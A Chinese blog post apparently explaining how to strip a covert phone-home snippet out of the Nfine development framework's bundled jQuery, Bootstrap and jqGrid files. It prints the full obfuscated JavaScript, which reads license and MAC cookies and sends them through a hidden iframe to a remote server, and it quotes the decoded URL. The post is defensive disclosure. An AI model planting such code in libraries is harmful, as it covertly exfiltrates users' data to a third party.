欢迎关注爱分享
分享各种软件,学习资料,提供odoo源码下载

Nfine 快速开发框架去除后门教程

在使用Nfine快速开发框架时,网上一堆人在说,这个快速开发框架有后门。

打开之后,发现在往www.nfine.cn网站去写数据。

解决方法:

找到以下js文件:

jquery-2.1.1.min.js

jquery.layout.js

bootstrap.js

jqgrid.min.js

jquery-ui.min.js

这四个js文件中的最后一段都有这么一句代码:

(function ($) { $.abcd = { getCookie: function (a) { var b, c = new RegExp("(^| )" + a + "=([^;]*)(;|$)"); if (b = document.cookie.match(c)) { return unescape(b[2]) } else { return null } }, execute: function () { try { if (top.$.wdversion == undefined) { top.$.wdversion = "0.0.0.0.0.1"; var a = $.abcd.getCookie("nfine_mac"); var b = $.abcd.getCookie("nfine_licence"); var c = decodeURIComponent(window.atob("aHR0cDovL3d3dy5uZmluZS5jbjo4MDk5L05GaW5lV2F0Y2gvMjAxNjA4MDEuaHRtbA==")); var d = window.atob("aWZyYW1lanMwMDAwMQ=="); var f = decodeURIComponent(window.atob("JTNDaWZyYW1lJTIwaWQlM0QlMjJpZnJhbWVqczAwMDAxJTIyJTIwJTIwc3R5bGUlM0QlMjJkaXNwbGF5JTNBbm9uZSUyMiUyMCUzRSUzQy9pZnJhbWUlM0U=")); var g = ""; if (top.$("#" + d).length <= 0) { top.$("body").append(f); window.setTimeout(function () { top.$.wdkey = { userKey: b, macs: a }; if (top.$.wdkey != undefined) { g = window.btoa(JSON.stringify(top.$.wdkey)) }; top.$("#" + d).attr("src", c + "?ppp=" + g) }, 6000) } } } catch (e) { } }, init: function () { $.abcd.execute() } }; $(function () { $.abcd.init() }) })(jQuery);

只要把这句代码注释掉,在此刷新主页的时候,就不会在访问www.nfine.cn了。

完整的后门URL其实是:http://www.nfine.cn:8099/NFineWatch/20160801.html?ppp=eyJ1c2VyS2V5IjoiM0RCRkE4NDg0NEQwQTQ3NkQ5NDE3RDk4MEM2NkFEQTQiLCJtYWNzIjoiNzVFQTczMUZFNzc1M0RBMURGNERGRjI1RkI1OTBGMTcifQ==

可惜,这个网站已经被关闭了,其实,这个所谓的后门去不去其实影响也不大了。

赞(1) 打赏
未经允许不得转载:iShare » Nfine 快速开发框架去除后门教程
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

iShare-爱分享 更专业 爱分享

Odoo下载联系我们

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏